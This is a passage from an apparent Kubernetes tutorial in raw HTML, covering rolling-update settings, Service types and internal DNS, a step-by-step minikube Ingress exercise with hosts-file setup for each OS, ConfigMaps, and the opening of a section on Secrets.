&lt;p&gt;The exact pacing depends on your &lt;code&gt;maxUnavailable&lt;/code&gt; and &lt;code&gt;maxSurge&lt;/code&gt; settings — Kubernetes may create or terminate multiple Pods at once for faster rollouts.&lt;br&gt;
&lt;/p&gt;
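The rounding rules matter at small replica counts, so they're worth pinning down. A quick sketch of how the documented Deployment semantics convert percentages to absolute Pod counts (the function name is mine, but the ceil/floor behavior is what Kubernetes specifies):

```python
import math

def surge_and_unavailable(replicas: int, max_surge_pct: int,
                          max_unavailable_pct: int) -> tuple:
    """Convert percentage settings to absolute Pod counts, per the
    Deployment rounding rules: maxSurge rounds up, maxUnavailable down."""
    surge = math.ceil(replicas * max_surge_pct / 100)
    unavailable = math.floor(replicas * max_unavailable_pct / 100)
    return surge, unavailable

# 3 replicas, both set to 25%:
print(surge_and_unavailable(3, 25, 25))    # (1, 0): surge first, never dip below 3
# 10 replicas, both set to 25%:
print(surge_and_unavailable(10, 25, 25))   # (3, 2): up to 13 total, at least 8 ready
```

This is why small Deployments update one Pod at a time while large ones can roll several in parallel.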

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Trigger a rolling update by changing the image version&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;image deployment/my-app my-app&lt;span class="o"&gt;=&lt;/span&gt;nginx:1.26

&lt;span class="c"&gt;# Watch the rollout&lt;/span&gt;
kubectl rollout status deployment/my-app

&lt;span class="c"&gt;# View rollout history&lt;/span&gt;
kubectl rollout &lt;span class="nb"&gt;history &lt;/span&gt;deployment/my-app

&lt;span class="c"&gt;# Rollback if needed!&lt;/span&gt;
kubectl rollout undo deployment/my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;







&lt;h2&gt;
  
  
  Part 6 — Networking: Services and How Apps Talk to Each Other
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Pods Are Ephemeral
&lt;/h3&gt;

&lt;p&gt;Pods get new IP addresses every time they're created. Their IPs are only valid inside the cluster network. You can't hardcode Pod IPs — they'll change whenever a Pod restarts or gets rescheduled. This is why Services exist.&lt;/p&gt;

&lt;h3&gt;
  
  
  Service Types
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flm644w17n06j33pidt8l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flm644w17n06j33pidt8l.png" alt="image" width="800" height="1068"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ClusterIP&lt;/strong&gt; (default)&lt;br&gt;
Only reachable &lt;em&gt;within&lt;/em&gt; the cluster. Used for internal service-to-service communication. Gets a stable virtual IP and a DNS name.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NodePort&lt;/strong&gt;&lt;br&gt;
Exposes the service on a static port (30000–32767) on every node's IP. Accessible from outside via &lt;code&gt;&amp;lt;NodeIP&amp;gt;:&amp;lt;NodePort&amp;gt;&lt;/code&gt;. Useful for local development and testing, but &lt;strong&gt;not recommended for production&lt;/strong&gt; — it exposes a port on every node and bypasses proper load balancing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;LoadBalancer&lt;/strong&gt;&lt;br&gt;
Provisions an external load balancer from your cloud provider (AWS, GCP, Azure, etc.), giving you a public IP or hostname. This is the standard way to expose public-facing apps in production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ExternalName&lt;/strong&gt;&lt;br&gt;
Maps a Service to an external DNS name. Useful for integrating with external services (like a managed database) without hardcoding URLs in your app.&lt;/p&gt;
&lt;h3&gt;
  
  
  Service YAML
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# service.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Service&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app-service&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;selector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;          &lt;span class="c1"&gt;# Routes traffic to Pods with this label&lt;/span&gt;
  &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TCP&lt;/span&gt;
    &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;             &lt;span class="c1"&gt;# Port the Service listens on&lt;/span&gt;
    &lt;span class="na"&gt;targetPort&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;       &lt;span class="c1"&gt;# Port on the Pod to forward to&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterIP&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Exercise 8: Services and Internal DNS
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; service.yaml

&lt;span class="c"&gt;# Every Service gets an automatic DNS name inside the cluster:&lt;/span&gt;
&lt;span class="c"&gt;# Format: &amp;lt;service-name&amp;gt;.&amp;lt;namespace&amp;gt;.svc.cluster.local&lt;/span&gt;
&lt;span class="c"&gt;# e.g.:   my-app-service.default.svc.cluster.local&lt;/span&gt;
&lt;span class="c"&gt;# Within the same namespace, just: my-app-service&lt;/span&gt;

&lt;span class="c"&gt;# Test DNS resolution from inside the cluster&lt;/span&gt;
kubectl run tmp-shell &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;curlimages/curl &lt;span class="nt"&gt;--&lt;/span&gt; sh
&lt;span class="c"&gt;# Inside the shell:&lt;/span&gt;
curl my-app-service
curl my-app-service.default.svc.cluster.local   &lt;span class="c"&gt;# fully-qualified form&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
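The DNS naming scheme in the comments above is entirely mechanical, so it can be made explicit with a small helper (a hypothetical function for illustration, not part of any Kubernetes client library):

```python
def service_fqdn(service: str, namespace: str = "default",
                 cluster_domain: str = "cluster.local") -> str:
    """Build the in-cluster DNS name every Service gets automatically:
    <service-name>.<namespace>.svc.<cluster-domain>"""
    return f"{service}.{namespace}.svc.{cluster_domain}"

print(service_fqdn("my-app-service"))
# my-app-service.default.svc.cluster.local

print(service_fqdn("payments", namespace="prod"))
# payments.prod.svc.cluster.local
```

Within the same namespace the short name resolves too, because each Pod's resolv.conf carries search domains for its own namespace.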

&lt;h3&gt;
  
  
  Ingress: The Smart HTTP Router
&lt;/h3&gt;

&lt;p&gt;For production web traffic, you typically put an &lt;strong&gt;Ingress&lt;/strong&gt; in front of your Services. An Ingress routes HTTP/HTTPS traffic based on rules (hostnames, URL paths).&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Critical:&lt;/strong&gt; An Ingress resource by itself does nothing. It requires an &lt;strong&gt;Ingress Controller&lt;/strong&gt; to be installed in the cluster — a running component that reads Ingress objects and actually configures the routing. Popular controllers include nginx, Traefik, and HAProxy. Without a controller, your Ingress YAML is just ignored.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp29zsf72mj92q7w6gwa8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp29zsf72mj92q7w6gwa8.png" alt="image" width="800" height="281"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Exercise 9b: End-to-End Ingress Walkthrough
&lt;/h3&gt;

&lt;p&gt;This exercise builds on the &lt;code&gt;my-app&lt;/code&gt; Deployment and &lt;code&gt;my-app-service&lt;/code&gt; Service from earlier. By the end you'll hit a real hostname routed through the Ingress controller to your Pods.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Mac users — read this before starting:&lt;/strong&gt; On Mac, minikube runs inside a VM or Docker container. The minikube IP (e.g. &lt;code&gt;192.168.49.2&lt;/code&gt;) lives inside that VM's private network and is &lt;strong&gt;not directly reachable from your Mac&lt;/strong&gt;. The steps below have a Mac-specific section to handle this. Linux and Windows users can follow the standard path.&lt;/p&gt;
&lt;/blockquote&gt;



&lt;p&gt;&lt;strong&gt;Step 1 — Enable the Ingress controller (minikube)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;minikube addons &lt;span class="nb"&gt;enable &lt;/span&gt;ingress

&lt;span class="c"&gt;# Wait until the controller Pod is Running (takes ~60 seconds)&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-n&lt;/span&gt; ingress-nginx &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;span class="c"&gt;# Look for: ingress-nginx-controller-xxx   Running&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;strong&gt;Step 2 — Create the Ingress resource&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Save the following as &lt;code&gt;ingress.yaml&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ingress.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;networking.k8s.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Ingress&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app-ingress&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;nginx.ingress.kubernetes.io/rewrite-target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;rules&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;host&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp.local&lt;/span&gt;
    &lt;span class="na"&gt;http&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/&lt;/span&gt;
        &lt;span class="na"&gt;pathType&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Prefix&lt;/span&gt;
        &lt;span class="na"&gt;backend&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app-service&lt;/span&gt;
            &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;number&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; ingress.yaml

&lt;span class="c"&gt;# Verify the Ingress was created and has an address assigned&lt;/span&gt;
kubectl get ingress my-app-ingress
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output (ADDRESS populates after ~30 seconds):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;NAME             CLASS   HOSTS        ADDRESS        PORTS   AGE
my-app-ingress   nginx   myapp.local  192.168.49.2   80      45s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If ADDRESS is blank after a minute, the Ingress controller isn't running yet — recheck Step 1.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 3 — Make the hostname reachable (OS-specific)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is where Mac and Linux/Windows diverge.&lt;/p&gt;

&lt;h4&gt;
  
  
  🍎 Mac
&lt;/h4&gt;

&lt;p&gt;On Mac, the minikube IP is not routable from your host. You need &lt;code&gt;minikube tunnel&lt;/code&gt; to bridge your Mac's localhost into the cluster.&lt;/p&gt;

&lt;p&gt;Open a &lt;strong&gt;new terminal window&lt;/strong&gt; and run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;minikube tunnel
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It will prompt for your sudo password (it needs to bind to ports 80 and 443). Leave this terminal open for the entire exercise — closing it stops the tunnel.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Tunnel successfully started
🏃 Starting tunnel for service my-app-ingress.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now add this line to &lt;code&gt;/etc/hosts&lt;/code&gt; (use &lt;code&gt;127.0.0.1&lt;/code&gt;, not the minikube IP):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'echo "127.0.0.1   myapp.local" &amp;gt;&amp;gt; /etc/hosts'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  🐧 Linux
&lt;/h4&gt;

&lt;p&gt;The minikube IP is directly reachable on Linux. Get it and add it to &lt;code&gt;/etc/hosts&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;minikube ip&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;   myapp.local"&lt;/span&gt; | &lt;span class="nb"&gt;sudo tee&lt;/span&gt; &lt;span class="nt"&gt;-a&lt;/span&gt; /etc/hosts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  🪟 Windows
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;minikube ip   &lt;span class="c"&gt;# note the IP, e.g. 192.168.49.2&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Open &lt;code&gt;C:\Windows\System32\drivers\etc\hosts&lt;/code&gt; as Administrator in Notepad and add:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;192.168.49.2   myapp.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;strong&gt;Step 4 — Verify routing works&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Should return nginx HTML&lt;/span&gt;
curl http://myapp.local

&lt;span class="c"&gt;# Or open in your browser&lt;/span&gt;
open http://myapp.local        &lt;span class="c"&gt;# Mac&lt;/span&gt;
xdg-open http://myapp.local   &lt;span class="c"&gt;# Linux&lt;/span&gt;
&lt;span class="c"&gt;# Windows: just paste http://myapp.local into a browser&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see the nginx welcome page served through the Ingress controller.&lt;/p&gt;

&lt;p&gt;If you're on Mac and it still times out, confirm the tunnel is still running in its terminal window and that &lt;code&gt;/etc/hosts&lt;/code&gt; has &lt;code&gt;127.0.0.1&lt;/code&gt; (not the minikube IP).&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 5 — Inspect what Kubernetes created&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Full details of the Ingress, including routing rules and backend&lt;/span&gt;
kubectl describe ingress my-app-ingress
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look for the &lt;code&gt;Rules&lt;/code&gt; section — it shows exactly which host + path maps to which Service and port.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 6 — Confirm the controller is doing the routing (optional deep-dive)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# The Ingress controller is just a Pod — you can see its access logs&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-n&lt;/span&gt; ingress-nginx &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="si"&gt;$(&lt;/span&gt;kubectl get pods &lt;span class="nt"&gt;-n&lt;/span&gt; ingress-nginx &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="nb"&gt;grep &lt;/span&gt;controller&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--tail&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;20
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You'll see a new access log line appear each time you curl &lt;code&gt;myapp.local&lt;/code&gt;.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 7 — Clean up&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete ingress my-app-ingress

&lt;span class="c"&gt;# Remove the /etc/hosts entry&lt;/span&gt;
&lt;span class="c"&gt;# Mac/Linux — remove the line you added:&lt;/span&gt;
&lt;span class="nb"&gt;sudo sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="s1"&gt;'/myapp.local/d'&lt;/span&gt; /etc/hosts   &lt;span class="c"&gt;# Mac&lt;/span&gt;
&lt;span class="nb"&gt;sudo sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'/myapp.local/d'&lt;/span&gt; /etc/hosts       &lt;span class="c"&gt;# Linux&lt;/span&gt;

&lt;span class="c"&gt;# Mac only — stop the tunnel in its terminal window with Ctrl+C&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;strong&gt;What you just validated end-to-end:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkbgkp0sbsr2y1k8l2y81.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkbgkp0sbsr2y1k8l2y81.png" alt="image" width="800" height="275"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Why the difference?&lt;/strong&gt; On Linux, the minikube network is routed directly to your host. On Mac, minikube runs inside a VM whose network is isolated — &lt;code&gt;minikube tunnel&lt;/code&gt; creates a temporary route via localhost to bridge that gap.&lt;/p&gt;
&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  Part 7 — Configuration and Secrets
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Why Not Hardcode Config?
&lt;/h3&gt;

&lt;p&gt;If you bake configuration into your container image, you need a new image for every environment (dev/staging/prod). Kubernetes provides two resources to inject config externally, keeping your images portable.&lt;/p&gt;

&lt;h3&gt;
  
  
  ConfigMaps
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# configmap.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-config&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;LOG_LEVEL&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;debug"&lt;/span&gt;
  &lt;span class="na"&gt;APP_ENV&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;staging"&lt;/span&gt;
  &lt;span class="na"&gt;config.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;{&lt;/span&gt;
      &lt;span class="s"&gt;"timeout": 30,&lt;/span&gt;
      &lt;span class="s"&gt;"retries": 3&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Using a ConfigMap in a Deployment:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;LOG_LEVEL&lt;/span&gt;
      &lt;span class="na"&gt;valueFrom&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;configMapKeyRef&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-config&lt;/span&gt;
          &lt;span class="na"&gt;key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;LOG_LEVEL&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;config-volume&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/config&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;config-volume&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-config&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;ConfigMap update behavior:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When a ConfigMap is mounted as a &lt;strong&gt;volume&lt;/strong&gt;, the files on disk are updated automatically — but with a delay (typically up to a minute). Importantly, the application must re-read the file to pick up changes. Apps that cache config at startup won't see updates without a restart.&lt;/li&gt;
&lt;li&gt;When a ConfigMap is used as an &lt;strong&gt;environment variable&lt;/strong&gt;, the Pod must be restarted to see updated values — env vars are set at container start and do not live-update.&lt;/li&gt;
&lt;/ul&gt;
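The difference between the two bullets comes down to how the application reads its config. A toy Python sketch (not Kubernetes code; the file write stands in for the kubelet syncing an updated volume-mounted ConfigMap):

```python
import json, os, tempfile

def write(path: str, text: str) -> None:
    with open(path, "w") as f:
        f.write(text)

class CachedConfig:
    """Reads the file once at startup; never sees later changes."""
    def __init__(self, path: str):
        with open(path) as f:
            self._value = json.load(f)
    def get(self) -> dict:
        return self._value

class LiveConfig:
    """Re-reads the mounted file on every access."""
    def __init__(self, path: str):
        self._path = path
    def get(self) -> dict:
        with open(self._path) as f:
            return json.load(f)

path = os.path.join(tempfile.mkdtemp(), "config.json")
write(path, '{"timeout": 30}')
cached, live = CachedConfig(path), LiveConfig(path)

write(path, '{"timeout": 60}')   # simulate the kubelet syncing an update
print(cached.get())  # {'timeout': 30}  (stale until the Pod restarts)
print(live.get())    # {'timeout': 60}  (picks up the new file)
```

Env-var injection behaves like `CachedConfig` by construction: the values are fixed at container start.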

&lt;h3&gt;
  
  
  Secrets
&lt;/h3&gt;

&lt;p&gt;Secrets work similarly to ConfigMaps but are intended for sensitive data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important security details:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Secrets are stored &lt;strong&gt;base64-encoded&lt;/strong&gt; in etcd. Base64 is &lt;em&gt;encoding&lt;/em&gt;, not encryption — anyone with etcd access can decode them trivially.&lt;/li&gt;
